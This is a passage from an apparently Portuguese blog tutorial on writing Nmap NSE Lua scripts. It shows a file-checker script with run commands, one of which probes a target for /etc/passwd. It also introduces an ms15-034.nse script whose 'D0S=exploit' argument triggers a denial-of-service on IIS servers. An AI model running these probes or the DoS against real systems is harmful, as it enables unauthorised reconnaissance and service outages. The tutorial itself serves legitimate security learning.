<span class="co1" style="color: grey; font-style: italic;">-- Seach for string stored in variable @args.file or use default</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> file <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>get_script_args<span class="br0" style="color: #66cc66;">(</span>SCRIPT_NAME<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">".file"</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw2" style="color: #aa9900; font-weight: bold;">or</span> <span class="st0" style="color: #ff6666;">"/robots.txt"</span></div>
</li>
</ol>
</center>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">Descrição: </span>a biblioteca 'shortport' vai se servir da função 'port_or_service' para só executar a secção 'the action section' se todos os valores retornarem correctos (port 80 tcp http open), a biblioteca 'stdnse.get_script_args' vai ler o que foi inserido no @argumento (e procurar por essa string) ou então vai procurar pelo valor default (/robots.txt) se não for utilizada a 'flag' '--script-args file=' </div>
<center>
<span style="color: red;">'shortport.port_or_service': </span><a href="https://nmap.org/nsedoc/lib/shortport.html#port_or_service" target="_blank">nsedoc/lib/shortport.html#port_or_service</a></center>
<center>
<span style="color: red;">'stdnse.get_script_args': </span><a href="http://nmap.org/nsedoc/lib/stdnse.html#get_script_args" target="_blank">nsedoc/lib/stdnse.html#get_script_args</a></center>
<center>
<span style="text-align: center;"><br /></span></center>
<center>
<span style="text-align: center;"><br /></span></center>
<center>
<span style="text-align: center;"><br /></span></center>
<center>
---'THE ACTION SECTION'---</center>
<center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
action <span class="sy0" style="color: #66cc66;">=</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">function</span><span class="br0" style="color: #66cc66;">(</span>host<span class="sy0" style="color: #66cc66;">,</span> port<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> response <span class="sy0" style="color: #66cc66;">=</span> http<span class="sy0" style="color: #66cc66;">.</span>get<span class="br0" style="color: #66cc66;">(</span>host<span class="sy0" style="color: #66cc66;">,</span> port<span class="sy0" style="color: #66cc66;">,</span> file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Check google API return codes to determine if file exists</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : STRING FOUND...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 200 OK<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">400</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : BadRequest...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 400 BadRequest<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">302</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Redirected...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 302 Redirected<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">401</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Unauthorized...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 401 Unauthorized<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : STRING NOT FOUND...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 404 NOT FOUND<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">403</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Forbidden...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 403 Forbidden<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">503</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Service_unavailable...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 503 Service_unavailable<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : UNDEFINED ERROR...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned "</span><span class="sy0" style="color: #66cc66;">..</span>response<span class="sy0" style="color: #66cc66;">.</span>status<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
</center>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">Descrição: </span>a função 'action = function(host, port)' vai executar os commands no <target>, na função seguinte a biblioteca 'http.get' retorna um recurso com um pedido GET, a API NSE 'response.status' vai verificar o codigo de retorno da API do google para determinar se o file existe, e vamos nos servir da API 'return' vai fazer o display do output...</div>
<center>
<span style="color: red;">'http.get': <a href="http://nmap.org/nsedoc/lib/http.html#get" target="_blank">nmap.org/nsedoc/lib/http.html#get</a></span></center>
<center>
</center>
<span style="font-size: large; text-align: -webkit-center;"></span><br />
<center>
<span style="font-size: large; text-align: -webkit-center;">file-checker.nse output:</span></center>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh02UFs9-6W4w1Bx2R9c8E0-S0ap_bUFdAU65d47Ui8CXxozaTQ8kHFRo_efYnM5shfXiNbNbDRTwQsi2qaCl8-5tIRQRxorbYf06vMezlPDOgvhYG8txXvaGMyxszYpAu9g_Nx1HN5lsc/s1600/loool.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh02UFs9-6W4w1Bx2R9c8E0-S0ap_bUFdAU65d47Ui8CXxozaTQ8kHFRo_efYnM5shfXiNbNbDRTwQsi2qaCl8-5tIRQRxorbYf06vMezlPDOgvhYG8txXvaGMyxszYpAu9g_Nx1HN5lsc/s640/loool.png" width="640" /></a></div>
<center>
</center>
<center>
<div>
<center style="text-align: center;">
<b>download file-checker.nse:</b> <a href="http://pastebin.com/9rGkpmDR" target="_blank">file-checker.nse</a></center>
<center>
<div style="text-align: start;">
<div style="text-align: center;">
<b>exporte o script para a base de dados do nmap</b> ('/nmap/scripts/' folder)</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo cp file-checker.nse /usr/share/nmap/scripts/file-checker.nse</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>actualize a base de dados do NSE</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>visualizar a descriçao do modulo</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap --script-help file-checker.nse</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>corra o script</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse <target></div>
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse --script-args file=/etc/passwd <target><span style="text-align: start;"> </span><span style="text-align: start;"> </span></div>
<br /></div>
</center>
</div>
<h2>
<span style="color: red; font-size: large;">ms15-034.nse</span></h2>
<div>
<div>
Detecta a vulnerabilidade MS15-034 (HTTP.sys) em servidores Microsoft IIS. e explora a condição denial-of-service usando argumentos de script (--script-args D0S=exploit) ou podemos verificar (escanear) ainda mais usando outro argumento (--script-args uri =/wellcome.png), o comportamento padrão 'default' será verificar pela existencia da vulnerabilidade, e só se for introduzido o @argumento D0S (--script-args D0S=exploit) é que será explorado o denial-of-service.</div>
<div>
versões afetadas são o Windows 7,8,8.1, Windows Server 2008 R2, 2012 e 2012R2.<br />
<span style="color: red;">An analysis of ms15-034:</span> <a href="http://www.securitysift.com/an-analysis-of-ms15-034/" target="_blank">an-analysis-of-ms15-034</a><br />
<br />
<br /></div>
</div>
<div style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/a7VRCoZcpT0/0.jpg" frameborder="0" height="380" src="https://www.youtube.com/embed/a7VRCoZcpT0?feature=player_embedded" width="85%"></iframe></div>
<div>
<br /></div>
<div>
<div style="-webkit-text-stroke-width: 0px; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: -webkit-center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<div style="text-align: center;">
<b>1º - download ms15-034.nse: </b><a href="http://pastebin.com/ygMTiDKp" target="_blank">ms15-034.nse</a></div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b> 2º - exporte o script para a base de dados do nmap</b> ('/nmap/scripts/' folder)</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo cp ms15-034.nse /usr/share/nmap/scripts/ms15-034.nse</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>3º - actualize a base de dados do NSE</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>4º - visualizar a descriçao do modulo</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap --script-help ms15-034.nse</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>5º - corra o script</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target></div>
</div>
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script ms15-034.nse --script-args D0S=exploit <target></div>
</div>
</div>
</div>
</div>
<div style="text-align: center;">
<br /></div>
<br />
<br />
<h2>
<span style="color: red; font-size: large;">How To Display outputs:</span></h2>
<div>
<b></b><br />
<center>
<b>usando return</b></center>
</div>
<div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- writting output to table (using return)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" FOUND..."</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" NOT FOUND..."</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" undefined"</span><span class="sy0" style="color: #66cc66;">..</span>response<span class="sy0" style="color: #66cc66;">.</span>status</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
<b></b><br />
<center>
<b>usando table.insert</b></center>
</div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">--writting output to table (using 'table.insert')</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING FOUND: "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned 200 OK"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING NOT FOUND: "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
